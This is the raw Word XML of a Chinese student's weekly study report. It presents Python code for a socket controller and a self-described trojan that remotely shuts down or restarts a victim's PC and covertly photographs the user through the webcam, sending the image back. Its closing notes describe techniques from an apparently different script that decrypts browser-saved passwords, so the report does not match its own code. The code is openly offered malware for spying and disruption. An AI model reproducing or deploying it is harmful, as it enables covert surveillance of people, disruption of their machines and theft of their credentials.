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D631D5"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第四周周报：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13883CC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本周我学习了爬虫技巧之如何远程控制电脑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83605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 w14:paraId="20AC23D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F390AD"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from socket import *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s = socket()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s.bind(('0.0.0.0', 8888))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s.listen()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s, addr = s.accept()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print(addr)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print('1.关机 2.重启 3.偷窥')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choice = input('请选择您要干的坏事的编号：')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s.send(choice.encode())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if choice=='3':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pass   #此处省略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file_size=int(s.recv(1024).decode())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s.send('接受了'.encode())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cur_size=0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with open('2.png', 'wb') as file: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     while cur_size &lt;file_size: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        data = s.recv(1024)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        file.write(data)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        cur_size += len(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FEEED5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FA2D4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木马：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1B8037"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from socket import *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import os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import cv2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s = socket()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s.connect(('127.0.0.1', 8888))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choice = s.recv(1024).decode()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if choice == "1":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os.system('shutdown -s -t 120')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elif choice == "2":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os.system('shutdown -r -t 120')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>elif choice == "3":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cap = cv2.VideoCapture(0)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ret, frame = cap.read()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ret.frame = cap.read()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cv2.imwrite('1.png', frame)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cap.release()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s.send('阿sir,收手吧'.encode())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file_size = os.path.getsize('1.png')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s.send(str(file_size).encode())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s.recv(1024).decode()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with open('1.png', 'rb') as file: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    for data in file:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">            s.send(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE5CF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A84953F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD741AA">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2946400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1B96"/>
    <w:p w14:paraId="286F0C3F"/>
    <w:p w14:paraId="5B06062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运行：先运行后台，再运行木马输入1，就可以强制电脑关机</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1648460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1FB2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="4192270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69D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取消重启方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D431F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同时按住window键和r键，输入shutdown -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6216F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CE4B4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同理：输入相应的数字就可以进行相应的操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B712140">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148EA885"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85979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32D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运行3就可以在运行的瞬间用电脑（入侵的）拍照并传输到电脑上（本地的）等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157EA3E0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知识点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B399870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该脚本涉及的技术可提炼为6个基础知识点</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A7276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1. Socket网络编程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B264BD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功能：实现客户端与服务端通信（如脚本中设备间传密码数据）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253F197B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关键：客户端用 connect() 连服务端，服务端用 bind()+listen() 等监听，数据需转二进制（ encode() / decode() ）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583BBEAE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2. Pickle序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC2BA8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功能：将Python对象（如列表）转二进制流，便于传输（脚本打包账号密码数据）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAC994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风险：反序列化可能执行恶意代码，合法场景优先用更安全的 json 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C3024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3. Windows加密（win32crypt）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1EB1A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功能：解密Windows受保护数据（如浏览器密钥），仅当前用户可解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78844CDF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核心： CryptUnprotectData() 函数，输入加密数据，输出解密结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FDFEB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4. SQLite数据库（sqlite3）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64545D6E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功能：操作轻量级数据库（如浏览器 Login Data ）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298E2FC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流程： connect() 连库→ cursor() 执行SQL→ fetchall() 取结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD4A74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5. AES-GCM加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21629A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功能：对称加密算法（加解密用同一密钥），保证数据安全（脚本解密密码）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12992AB5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关键：需密钥、初始化向量（IV），解密后要剔除16字节认证标签。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A25A2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6. 文件路径操作（os/shutil）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251584EA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 os.getenv() ：获取系统环境变量（如定位浏览器路径）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA2B49C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-  shutil.copy() ：复制文件（脚本规避浏览器文件占用问题）。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F3501"/>
    <w:rsid w:val="1CC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2025-08-29T03:33:00Z</dcterms:created>
  <dc:creator>WPS_1723032943</dc:creator>
  <cp:lastModifiedBy>WPS_1723032943</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-29T08:38:51Z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1391722619F94751874B432357529694_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZjFmZWIzNDg2MmIzZjExOTIzMmViNTBmYTMwYTk0ZWYiLCJ1c2VySWQiOiIxNjE5Mjk5ODM3In0=</vt:lpwstr>
  </property>
</Properties>
</file>